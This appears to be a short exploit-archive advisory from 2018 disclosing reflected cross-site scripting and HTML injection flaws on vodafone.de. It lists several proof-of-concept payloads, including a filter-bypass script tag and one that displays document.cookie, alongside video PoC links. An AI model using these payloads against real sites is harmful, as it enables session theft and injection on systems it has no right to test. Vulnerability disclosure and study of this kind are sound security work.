Vodafone DE Cross Site Scripting

The vodafone.de site suffers from multiple cross site scripting and HTML injection vulnerabilities.


MD5 | 3ecddb13fe9215d92c2b556df3820610

# Exploit Title: [ XSS Reflected ( Cross Site Scripting ) at Vodafone DE ]

# Date: [02.01.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [www.vodafone.de]

# PoC

https://www.youtube.com/watch?v=YCjNEW6gNgg

# XSS Reflected Payload :

<svg/onload=alert('ismailtasdelen')>

# Exploit Title: [ HTML Injection at Vodafone DE ]

# PoC

https://www.youtube.com/watch?v=aF6X3n6l8AA

# HTML Injection Payload :

<IMG SRC="https://upload.wikimedia.org/wikipedia/en/9/95/Vodafone_logo_2017.png">


# Exploit Title: [ Chrome XSS ( Cross Site Scripting ) Bypass at Vodafone DE ]

# PoC

https://www.youtube.com/watch?v=D67H4k_tm7U

# Chrome XSS ( Cross Site Scripting ) Bypass Payload :

<IMG """><SCRIPT>alert("Ismail Tasdelen")</SCRIPT>">

<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">


# Exploit Title: [ Chrome XSS ( Cross Site Scripting ) Bypass at Vodafone DE ]

# PoC

https://www.youtube.com/watch?v=ddxJUBBc2ZY

# Chrome XSS ( Cross Site Scripting ) Bypass Payload :

<script ~~~>alert(0%0)</script ~~~>

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen/

Related Posts

Comments